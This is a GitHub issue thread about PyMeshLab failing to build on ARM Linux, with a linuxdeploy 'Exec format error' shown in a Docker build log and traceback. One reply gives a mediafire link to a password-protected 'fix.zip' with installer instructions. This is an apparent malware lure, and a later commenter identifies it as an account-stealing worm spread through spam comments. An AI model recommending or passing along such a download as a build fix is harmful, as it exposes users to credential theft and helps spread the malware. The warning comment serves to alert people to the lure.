### ISSUE TITLE
arm linux build

### ISSUE THREAD

**Issue by johnnynunez** [cnr-isti-vclab/PyMeshLab#389]
```bash
+ echo 'Deploying pymeshlab 2023.12.post1'
+ sh scripts/Linux/2_deploy.sh /opt/pymeshlab/pymeshlab
Deploying pymeshlab 2023.12.post1
scripts/Linux/2_deploy.sh: 46: /opt/pymeshlab/scripts/Linux/../../src/meshlab/resources/linux/linuxdeploy: Exec format error
linuxdeploy failed with error code 126. Script was not completed successfully.
The command '/bin/sh -c /tmp/PYMESHLAB/install.sh || /tmp/PYMESHLAB/build.sh' returned a non-zero code: 1
Traceback (most recent call last):
  File "/usr/lib/python3.10/runpy.py", line 196, in _run_module_as_main
    return _run_code(code, main_globals, None,
  File "/usr/lib/python3.10/runpy.py", line 86, in _run_code
    exec(code, run_globals)
  File "/home/johnny/Projects/jetson-containers/jetson_containers/build.py", line 103, in <module>
    build_container(args.name, args.packages, args.base, args.build_flags, args.simulate, args.skip_tests, args.test_only, args.push, args.no_github_api)
  File "/home/johnny/Projects/jetson-containers/jetson_containers/container.py", line 143, in build_container
    status = subprocess.run(cmd.replace(_NEWLINE_, ' '), executable='/bin/bash', shell=True, check=True)  
  File "/usr/lib/python3.10/subprocess.py", line 526, in run
    raise CalledProcessError(retcode, process.args,
subprocess.CalledProcessError: Command 'DOCKER_BUILDKIT=0 docker build --network=host --tag pymeshlab:r36.3.0-cu122-pymeshlab --file /home/johnny/Projects/jetson-containers/packages/nerf/pymeshlab/Dockerfile --build-arg BASE_IMAGE=pymeshlab:r36.3.0-cu122-polyscope --build-arg PYMESHLAB_VERSION="2023.12.post1" /home/johnny/Projects/jetson-containers/packages/nerf/pymeshlab 2>&1 | tee /home/johnny/Projects/jetson-containers/logs/20240827_171431/build/pymeshlab_r36.3.0-cu122-pymeshlab.txt; exit ${PIPESTATUS[0]}' returned non-zero exit status 1.
```

**Comment by johnnynunez** [comment]
runner arm: https://github.com/orgs/github/projects/4247/views/1?filterQuery=ARM&pane=issue&itemId=60910207

**Comment by yldzmuhammed** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by MahouShoujoMivutilde** [comment]
Do **NOT** run it.

It's malware that'll steal your account if executed, to spread further spamming the same message elsewhere, like happened to this person.

There are a lot of comments like that

https://github.com/search?q=is%3Aissue+%22In+the+installer+menu%2C+select+%5C%22gcc.%5C%22%22+AND+%22password%3A+changeme%22&type=issues&s=created&o=desc

(and this is how I found this issue)
